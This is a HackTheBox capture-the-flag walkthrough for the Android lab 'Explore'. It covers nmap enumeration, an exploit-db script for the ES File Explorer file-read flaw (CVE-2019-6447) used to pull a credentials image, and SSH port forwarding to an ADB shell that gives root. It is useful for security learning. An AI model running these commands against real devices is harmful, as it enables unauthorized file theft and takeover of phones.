HackTheBox Walkthrough : Explore

Today we come up with another challenge from “Hackthebox” called “explore”. This lab is based on android exploitation in which ES explorer is vulnerable . So without wasting too much time let start.

Level : Easy

Attacking Strategy

  • Networking Scanning
    • Nmap
  • Exploitation
    • ES explorer Vulnerability (CVE-2019-6447)
  • Privilege Escalation
    • Port Forwarding
    • ADB Shell

Walkthrough

IP Address : 10.10.10.247

We start with Nmap scan which reveals some open ports and services like 2222 SSH , HTTP on 42135, HTTP on 59777,etc.

nmap -p- -sC -sV --min-rate 10000 -oN nmap 10.10.10.247
Nmap scan report for 10.10.10.247
Host is up (0.091s latency).
Not shown: 65530 closed ports
PORT      STATE    SERVICE VERSION
2222/tcp  open     ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey: 
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp  filtered freeciv
36917/tcp open     unknown
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.0 400 Bad Request
|     Date: Sat, 16 Oct 2021 06:03:34 GMT
|     Content-Length: 22
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|   GetRequest: 
|     HTTP/1.1 412 Precondition Failed
|     Date: Sat, 16 Oct 2021 06:03:34 GMT
|     Content-Length: 0
|   HTTPOptions: 
|     HTTP/1.0 501 Not Implemented
|     Date: Sat, 16 Oct 2021 06:03:39 GMT
|     Content-Length: 29
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Method not supported: OPTIONS
|   Help: 
|     HTTP/1.0 400 Bad Request
|     Date: Sat, 16 Oct 2021 06:03:55 GMT
|     Content-Length: 26
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: HELP
|   RTSPRequest: 
|     HTTP/1.0 400 Bad Request
|     Date: Sat, 16 Oct 2021 06:03:39 GMT
|     Content-Length: 39
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     valid protocol version: RTSP/1.0
|   SSLSessionReq: 
|     HTTP/1.0 400 Bad Request
|     Date: Sat, 16 Oct 2021 06:03:55 GMT
|     Content-Length: 73
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|     ?G???,???`~?
|     ??{????w????<=?o?
|   TLSSessionReq: 
|     HTTP/1.0 400 Bad Request
|     Date: Sat, 16 Oct 2021 06:03:55 GMT
|     Content-Length: 71
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|     ??random1random2random3random4
|   TerminalServerCookie: 
|     HTTP/1.0 400 Bad Request
|     Date: Sat, 16 Oct 2021 06:03:55 GMT
|     Content-Length: 54
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|_    Cookie: mstshash=nmap
42135/tcp open     http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
Service Info: Device: phone

From the nmap result its clear this is some kind of android from service information,further we start enumerating port 59777 HTTP so we run content discovery tools like gubuster , dirb but nothing in hand.In 2018 we have KITKAT based android device in which file system representation is like sdcard,sdcard0,sdcard1 which i remember correctly because of rooting the device at that time.So we think can we enumerate on this endpoint.

feroxbuster -u http://10.10.10.247:59777/sdcard -x txt 

And we got the flag here , but after sometime this is dead end for this service as no other disclosure happen .

Exploitation

So we moved to second port i.e port 42135 on which ES File Explorer is running on , after google about the service we got the exploit in which Arbitrary File read vulnerability exits.

So we simply download the exploit from exploit-db , after reading the exploit we can pass some command like getDeviceInfo , getFile , etc.

python3 50070.py getDeviceInfo 10.10.10.247
python3 50070.py listPics 10.10.10.247
python3 50070.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg

From “listpics” command there are some picture listed in which one is listed as “creds.jpg” so we simply download the file with “getFile” command and we got credentials from “kristi” user.

kristi

[email protected]!

Privilege Escalation

Now we got the SSH credentials for low user but we want to hunt for root power and this time we stuck ,as only port which is left without touching is 5555 which is used by ADB by default . For further we need to study about adb .After study about adb all we need to do a simple port forwarding and then access the shell over localhost.

ssh -L 5555:localhost:5555 [email protected] -p 2222

Once the port forwarding is done we can access the shell on local host and switch user to root and collect flags.

adb -s 127.0.0.1:5555 shell
su 
cat data/root.txt

References

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.